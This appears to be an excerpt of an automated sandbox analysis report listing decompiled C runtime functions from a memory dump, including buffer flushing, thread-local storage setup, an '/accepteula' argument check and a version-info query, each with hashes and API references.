                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID: pYet
                                                          • API String ID: 3058430110-1727283320
                                                          • Opcode ID: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
                                                          • Instruction ID: 60a8676b7946a16de792e5a19dc617b5d93a58ec6caea168880f03a11062425c
                                                          • Opcode Fuzzy Hash: 3fc5b2d2f1e3e2c4c861b4164b33fcbf6a78946a5b9e7531fab444a04c299768
                                                          • Instruction Fuzzy Hash: F231C031B00246EFEB20DFA4C8849AA7BA5AF00311F1485BAE5A4AF2D2D7359D40DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E00408DC9(void* __edx, void* __fp0, signed int _a4, signed char** _a8) {
                                                          				signed int _v8;
                                                          				char _v16;
                                                          				char _v20;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t39;
                                                          				void* _t45;
                                                          				void* _t49;
                                                          				void* _t53;
                                                          				signed short _t56;
                                                          				signed int _t61;
                                                          				signed int _t71;
                                                          				signed int _t77;
                                                          				signed char* _t93;
                                                          				signed char* _t102;
                                                          				signed char* _t104;
                                                          				void* _t112;
                                                          				signed char** _t114;
                                                          				signed int _t115;
                                                          
                                                          				_t128 = __fp0;
                                                          				_t112 = __edx;
                                                          				_t39 =  *0x413004; // 0xf284055d
                                                          				_v8 = _t39 ^ _t115;
                                                          				_t114 = _a8;
                                                          				if((_t114[3] & 0x00000040) != 0) {
                                                          					L34:
                                                          					_t34 =  &(_t114[1]);
                                                          					 *_t34 =  &(_t114[1][0xfffffffffffffffe]);
                                                          					if( *_t34 < 0) {
                                                          						_t42 = E0040BE3B(_t81, _t112, 0x413a18, _t128, _a4 & 0x0000ffff, _t114);
                                                          					} else {
                                                          						_t42 = _a4;
                                                          						 *( *_t114) = _a4;
                                                          						 *_t114 =  &(( *_t114)[2]);
                                                          					}
                                                          					L37:
                                                          					return E0040318A(_t42, _t81, _v8 ^ _t115, _t112, 0x413a18, _t114);
                                                          				}
                                                          				if(E00408D9C(_t115, __fp0, _t114) == 0xffffffff || E00408D9C(_t115, __fp0, _t114) == 0xfffffffe) {
                                                          					_t45 = 0x413a18;
                                                          				} else {
                                                          					_t77 = E00408D9C(_t115, __fp0, _t114) >> 5;
                                                          					_t81 = 0x415ae0 + _t77 * 4;
                                                          					_t45 = (E00408D9C(_t115, _t128, _t114) & 0x0000001f) * 0x38 +  *(0x415ae0 + _t77 * 4);
                                                          				}
                                                          				_t8 = _t45 + 0x24; // 0x0
                                                          				if(( *_t8 & 0x0000007f) == 2) {
                                                          					goto L34;
                                                          				} else {
                                                          					if(E00408D9C(_t115, _t128, _t114) == 0xffffffff || E00408D9C(_t115, _t128, _t114) == 0xfffffffe) {
                                                          						_t49 = 0x413a18;
                                                          					} else {
                                                          						_t71 = E00408D9C(_t115, _t128, _t114) >> 5;
                                                          						_t81 = 0x415ae0 + _t71 * 4;
                                                          						_t49 = (E00408D9C(_t115, _t128, _t114) & 0x0000001f) * 0x38 +  *(0x415ae0 + _t71 * 4);
                                                          					}
                                                          					_t11 = _t49 + 0x24; // 0x0
                                                          					if(( *_t11 & 0x0000007f) != 1) {
                                                          						if(E00408D9C(_t115, _t128, _t114) == 0xffffffff || E00408D9C(_t115, _t128, _t114) == 0xfffffffe) {
                                                          							_t53 = 0x413a18;
                                                          						} else {
                                                          							_t61 = E00408D9C(_t115, _t128, _t114) >> 5;
                                                          							_t81 = 0x415ae0 + _t61 * 4;
                                                          							_t53 = (E00408D9C(_t115, _t128, _t114) & 0x0000001f) * 0x38 +  *(0x415ae0 + _t61 * 4);
                                                          						}
                                                          						if(( *(_t53 + 4) & 0x00000080) == 0) {
                                                          							goto L34;
                                                          						} else {
                                                          							_t56 = E0040C10A( &_v20,  &_v16, 5, _a4);
                                                          							if(_t56 != 0) {
                                                          								goto L15;
                                                          							}
                                                          							_t81 = 0;
                                                          							if(_v20 <= 0) {
                                                          								L33:
                                                          								_t42 = _a4;
                                                          								goto L37;
                                                          							} else {
                                                          								goto L28;
                                                          							}
                                                          							while(1) {
                                                          								L28:
                                                          								_t26 =  &(_t114[1]);
                                                          								 *_t26 = _t114[1] - 1;
                                                          								if( *_t26 < 0) {
                                                          									_t56 = E00404C86(_t81, 0x413a18,  *((char*)(_t115 + _t81 - 0xc)), _t114);
                                                          								} else {
                                                          									 *( *_t114) =  *((intOrPtr*)(_t115 + _t81 - 0xc));
                                                          									_t93 =  *_t114;
                                                          									_t56 =  *_t93 & 0x000000ff;
                                                          									 *_t114 =  &(_t93[1]);
                                                          								}
                                                          								if(_t56 == 0xffffffff) {
                                                          									goto L15;
                                                          								}
                                                          								_t81 = _t81 + 1;
                                                          								if(_t81 < _v20) {
                                                          									continue;
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					} else {
                                                          						_t12 =  &(_t114[1]);
                                                          						 *_t12 = _t114[1] - 1;
                                                          						_t81 = _a4;
                                                          						if( *_t12 < 0) {
                                                          							_t56 = E00404C86(_t81, 0x413a18, _t81, _t114);
                                                          						} else {
                                                          							 *( *_t114) = _t81;
                                                          							_t104 =  *_t114;
                                                          							_t56 =  *_t104 & 0x000000ff;
                                                          							 *_t114 =  &(_t104[1]);
                                                          						}
                                                          						if(_t56 != 0xffffffff) {
                                                          							_t15 =  &(_t114[1]);
                                                          							 *_t15 = _t114[1] - 1;
                                                          							if( *_t15 < 0) {
                                                          								_t56 = E00404C86(_t81, 0x413a18, _t81, _t114);
                                                          							} else {
                                                          								 *( *_t114) = _t81;
                                                          								_t102 =  *_t114;
                                                          								_t56 =  *_t102 & 0x000000ff;
                                                          								 *_t114 =  &(_t102[1]);
                                                          							}
                                                          							if(_t56 == 0xffffffff) {
                                                          								goto L15;
                                                          							} else {
                                                          								_t42 = _t81;
                                                          								goto L37;
                                                          							}
                                                          						} else {
                                                          							L15:
                                                          							_t42 = _t56 | 0x0000ffff;
                                                          							goto L37;
                                                          						}
                                                          					}
                                                          				}
                                                          			}
























                                                          0x00408dc9
                                                          0x00408dc9
                                                          0x00408dcf
                                                          0x00408dd6
                                                          0x00408ddb
                                                          0x00408de3
                                                          0x00408f78
                                                          0x00408f78
                                                          0x00408f78
                                                          0x00408f7c
                                                          0x00408f91
                                                          0x00408f7e
                                                          0x00408f80
                                                          0x00408f83
                                                          0x00408f86
                                                          0x00408f86
                                                          0x00408f98
                                                          0x00408fa6
                                                          0x00408fa6
                                                          0x00408df8
                                                          0x00408e28
                                                          0x00408e06
                                                          0x00408e0c
                                                          0x00408e10
                                                          0x00408e22
                                                          0x00408e25
                                                          0x00408e2a
                                                          0x00408e31
                                                          0x00000000
                                                          0x00408e37
                                                          0x00408e41
                                                          0x00408e71
                                                          0x00408e4f
                                                          0x00408e55
                                                          0x00408e59
                                                          0x00408e6b
                                                          0x00408e6e
                                                          0x00408e73
                                                          0x00408e7a
                                                          0x00408ee2
                                                          0x00408f12
                                                          0x00408ef0
                                                          0x00408ef6
                                                          0x00408efa
                                                          0x00408f0c
                                                          0x00408f0f
                                                          0x00408f18
                                                          0x00000000
                                                          0x00408f1a
                                                          0x00408f27
                                                          0x00408f31
                                                          0x00000000
                                                          0x00000000
                                                          0x00408f37
                                                          0x00408f3c
                                                          0x00408f72
                                                          0x00408f72
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00408f3e
                                                          0x00408f3e
                                                          0x00408f3e
                                                          0x00408f3e
                                                          0x00408f41
                                                          0x00408f5c
                                                          0x00408f43
                                                          0x00408f49
                                                          0x00408f4b
                                                          0x00408f4d
                                                          0x00408f51
                                                          0x00408f51
                                                          0x00408f66
                                                          0x00000000
                                                          0x00000000
                                                          0x00408f6c
                                                          0x00408f70
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00408f70
                                                          0x00000000
                                                          0x00408f3e
                                                          0x00408e7c
                                                          0x00408e7c
                                                          0x00408e7c
                                                          0x00408e7f
                                                          0x00408e82
                                                          0x00408e97
                                                          0x00408e84
                                                          0x00408e86
                                                          0x00408e88
                                                          0x00408e8a
                                                          0x00408e8e
                                                          0x00408e8e
                                                          0x00408ea1
                                                          0x00408eac
                                                          0x00408eac
                                                          0x00408eaf
                                                          0x00408ec4
                                                          0x00408eb1
                                                          0x00408eb3
                                                          0x00408eb5
                                                          0x00408eb7
                                                          0x00408ebb
                                                          0x00408ebb
                                                          0x00408ece
                                                          0x00000000
                                                          0x00408ed0
                                                          0x00408ed0
                                                          0x00000000
                                                          0x00408ed0
                                                          0x00408ea3
                                                          0x00408ea3
                                                          0x00408ea3
                                                          0x00000000
                                                          0x00408ea3
                                                          0x00408ea1
                                                          0x00408e7a

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf$__flswbuf_wctomb_s
                                                          • String ID:
                                                          • API String ID: 3257920507-0
                                                          • Opcode ID: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
                                                          • Instruction ID: e3320308620aae82afad94c34382f6534f6cf98c8d3c2b43a25689cd414ae7a4
                                                          • Opcode Fuzzy Hash: ca31858a28c25628787a6cd13da6845824825ffbc45749ff7d1aa03c197881a4
                                                          • Instruction Fuzzy Hash: 9B5127721196119ECB249B38DA818AB37A8DF16335330073FF5E1EB2D1DE3C9502869D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00401800(void* __ebx, intOrPtr* __edi, void* __esi) {
                                                          				void* __ebp;
                                                          				void* _t16;
                                                          				void* _t18;
                                                          				void* _t19;
                                                          				intOrPtr* _t25;
                                                          				signed int _t27;
                                                          				char _t29;
                                                          				void* _t30;
                                                          
                                                          				_t25 = __edi;
                                                          				_t19 = __ebx;
                                                          				_t29 = 0;
                                                          				if(__edi != 0) {
                                                          					_t27 = 0;
                                                          					if( *__edi > 0) {
                                                          						while(1) {
                                                          							_t16 = E0040346A(_t19, _t29,  *((intOrPtr*)(_t19 + _t27 * 4)), L"/accepteula");
                                                          							_t30 = _t30 + 8;
                                                          							if(_t16 == 0) {
                                                          								break;
                                                          							}
                                                          							_t18 = E0040346A(_t19, _t29,  *((intOrPtr*)(_t19 + _t27 * 4)), L"-accepteula");
                                                          							_t30 = _t30 + 8;
                                                          							if(_t18 == 0) {
                                                          								break;
                                                          							} else {
                                                          								_t27 = _t27 + 1;
                                                          								if(_t27 <  *_t25) {
                                                          									continue;
                                                          								} else {
                                                          								}
                                                          							}
                                                          							goto L10;
                                                          						}
                                                          						_t29 = 1;
                                                          						while(_t27 <  *_t25 - 1) {
                                                          							 *((intOrPtr*)(_t19 + _t27 * 4)) =  *((intOrPtr*)(_t19 + 4 + _t27 * 4));
                                                          							_t27 = _t27 + 1;
                                                          						}
                                                          						 *_t25 =  *_t25 + 0xffffffff;
                                                          					}
                                                          					L10:
                                                          				}
                                                          				if(E00401470(_t29) != 0) {
                                                          					_t29 = 1;
                                                          				}
                                                          				return 0 | _t29 != 0x00000000;
                                                          			}











                                                          0x00401800
                                                          0x00401800
                                                          0x00401801
                                                          0x00401805
                                                          0x00401808
                                                          0x0040180c
                                                          0x00401810
                                                          0x00401819
                                                          0x0040181e
                                                          0x00401823
                                                          0x00000000
                                                          0x00000000
                                                          0x0040182e
                                                          0x00401833
                                                          0x00401838
                                                          0x00000000
                                                          0x0040183a
                                                          0x0040183a
                                                          0x0040183f
                                                          0x00000000
                                                          0x00000000
                                                          0x00401841
                                                          0x0040183f
                                                          0x00000000
                                                          0x00401838
                                                          0x00401845
                                                          0x0040184e
                                                          0x00401854
                                                          0x00401859
                                                          0x0040185d
                                                          0x00401861
                                                          0x00401861
                                                          0x00401864
                                                          0x00401864
                                                          0x00401870
                                                          0x00401872
                                                          0x00401872
                                                          0x0040187f

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: __wcsicmp
                                                          • String ID: -accepteula$/accepteula
                                                          • API String ID: 1389419275-3604086781
                                                          • Opcode ID: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
                                                          • Instruction ID: ae80dfe79650e11862fde2afe1a2a16d5d6f03895628a9dbedd2dac65a09cae5
                                                          • Opcode Fuzzy Hash: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
                                                          • Instruction Fuzzy Hash: F1012473D0022A87CB307EBA9C41B6B77486B50348F11863AAC59B73D2EA79DE50C695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E004065E8(void* __ebx, void* __edx, void* __fp0) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t3;
                                                          				intOrPtr* _t8;
                                                          				void* _t9;
                                                          				long _t12;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				long _t21;
                                                          				long* _t22;
                                                          
                                                          				_t20 = __edx;
                                                          				_t3 = GetLastError();
                                                          				_push( *0x4138c0);
                                                          				_t21 = _t3;
                                                          				_t22 =  *((intOrPtr*)(E004064BA()))();
                                                          				if(_t22 == 0) {
                                                          					_t22 = E00407C87(1, 0x214);
                                                          					if(_t22 != 0) {
                                                          						_push(_t22);
                                                          						_push( *0x4138c0);
                                                          						_t8 = E00406443( *0x4144f8);
                                                          						_pop(_t16);
                                                          						_t9 =  *_t8();
                                                          						_t25 = _t9;
                                                          						if(_t9 == 0) {
                                                          							_push(_t22);
                                                          							E00403199(__ebx, _t16, _t20, _t21, _t22, __eflags);
                                                          							_t22 = 0;
                                                          							__eflags = 0;
                                                          						} else {
                                                          							_push(0);
                                                          							_push(_t22);
                                                          							E00406529(__ebx, _t16, _t20, _t21, _t22, _t25, __fp0);
                                                          							_t12 = GetCurrentThreadId();
                                                          							_t22[1] = _t22[1] | 0xffffffff;
                                                          							 *_t22 = _t12;
                                                          						}
                                                          					}
                                                          				}
                                                          				SetLastError(_t21);
                                                          				return _t22;
                                                          			}













                                                          0x004065e8
                                                          0x004065ea
                                                          0x004065f0
                                                          0x004065f6
                                                          0x004065ff
                                                          0x00406603
                                                          0x00406611
                                                          0x00406617
                                                          0x00406619
                                                          0x0040661a
                                                          0x00406626
                                                          0x0040662b
                                                          0x0040662c
                                                          0x0040662e
                                                          0x00406630
                                                          0x0040664a
                                                          0x0040664b
                                                          0x00406651
                                                          0x00406651
                                                          0x00406632
                                                          0x00406632
                                                          0x00406634
                                                          0x00406635
                                                          0x0040663c
                                                          0x00406642
                                                          0x00406646
                                                          0x00406646
                                                          0x00406630
                                                          0x00406617
                                                          0x00406654
                                                          0x0040665e

                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00406665,?,004085BE,00000000,00000000,00000000), ref: 004065EA
                                                            • Part of subcall function 004064BA: TlsGetValue.KERNEL32(?,004065FD), ref: 004064C1
                                                            • Part of subcall function 004064BA: TlsSetValue.KERNEL32(00000000), ref: 004064E2
                                                          • __calloc_crt.LIBCMT ref: 0040660C
                                                            • Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
                                                            • Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC
                                                            • Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                            • Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                            • Part of subcall function 00406529: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
                                                            • Part of subcall function 00406529: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
                                                            • Part of subcall function 00406529: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
                                                            • Part of subcall function 00406529: InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
                                                            • Part of subcall function 00406529: ___addlocaleref.LIBCMT ref: 004065C7
                                                          • GetCurrentThreadId.KERNEL32 ref: 0040663C
                                                          • SetLastError.KERNEL32(00000000), ref: 00406654
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl
                                                          • String ID:
                                                          • API String ID: 4195734883-0
                                                          • Opcode ID: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
                                                          • Instruction ID: 6acc180e9db3e0c08f8946cbde5c9b75496807f8aa197502050a49a5b2d53bc3
                                                          • Opcode Fuzzy Hash: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
                                                          • Instruction Fuzzy Hash: 13F04C324002226BD2313BB5BC0668A3B95DF01BB9B12453FF542BA2D0DF3DC91182DD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E00401C30(signed int __ecx, void* __edx, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t20;
                                                          				short _t21;
                                                          				void* _t33;
                                                          				void* _t46;
                                                          				void* _t49;
                                                          				short* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = _t52 - 0x204;
                                                          				_push(0xfffffffe);
                                                          				_push(0x411d48);
                                                          				_push(E00404AF0);
                                                          				_push( *[fs:0x0]);
                                                          				_t20 =  *0x413004; // 0xf284055d
                                                          				 *(_t50 - 8) =  *(_t50 - 8) ^ _t20;
                                                          				_t21 = _t20 ^ _t50;
                                                          				_t50[0x100] = _t21;
                                                          				 *[fs:0x0] = _t50 - 0x10;
                                                          				 *((intOrPtr*)(_t50 - 0x18)) = _t52 - 0x1f0;
                                                          				 *(_t50 - 0x1c) = 0;
                                                          				_push(_t50[0x108]);
                                                          				_push(_t50[0x106] & 0x0000ffff);
                                                          				E004032BD(_t50, 0x100, L"\\StringFileInfo\\%04X%04X\\%s", __ecx & 0x0000ffff);
                                                          				 *((intOrPtr*)(_t50 - 4)) = 0;
                                                          				_t43 = _t50;
                                                          				 *(_t50 - 0x1c) = VerQueryValueW(__edx, _t50, _t50 - 0x20, _t50 - 0x24);
                                                          				 *((intOrPtr*)(_t50 - 4)) = 0xfffffffe;
                                                          				asm("sbb eax, eax");
                                                          				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0x10));
                                                          				_pop(_t46);
                                                          				_pop(_t49);
                                                          				_t33 = _t21;
                                                          				return E0040318A( ~( *(_t50 - 0x1c)) &  *(_t50 - 0x20), _t33, _t50[0x100] ^ _t50, _t43, _t46, _t49);
                                                          			}














                                                          0x00401c31
                                                          0x00401c3e
                                                          0x00401c40
                                                          0x00401c45
                                                          0x00401c50
                                                          0x00401c54
                                                          0x00401c59
                                                          0x00401c5c
                                                          0x00401c5e
                                                          0x00401c6b
                                                          0x00401c71
                                                          0x00401c7e
                                                          0x00401c81
                                                          0x00401c89
                                                          0x00401c9c
                                                          0x00401ca4
                                                          0x00401caf
                                                          0x00401cb9
                                                          0x00401cc7
                                                          0x00401cd3
                                                          0x00401cdb
                                                          0x00401ce3
                                                          0x00401ce4
                                                          0x00401ce5
                                                          0x00401cfc

                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00401C9C
                                                            • Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0
                                                          • VerQueryValueW.VERSION(00000000,?,?,?,?,?,F284055D,?,00000000,00000000,?,?,00404AF0,00411D48,000000FE), ref: 00401CB4
                                                          Strings
                                                          • \StringFileInfo\%04X%04X\%s, xrefs: 00401C8E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: QueryValue__vswprintf_s_l_swprintf
                                                          • String ID: \StringFileInfo\%04X%04X\%s
                                                          • API String ID: 4007372565-3176804452
                                                          • Opcode ID: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
                                                          • Instruction ID: 16fea18b266e5000ac73c5f0c1a7a8be829457a3a8ce474c65f6ca9c4e30ee4f
                                                          • Opcode Fuzzy Hash: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
                                                          • Instruction Fuzzy Hash: 242169B2940248ABDB20DF95DC45FEE77F8FB48710F10465EF515A7181D6785604CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%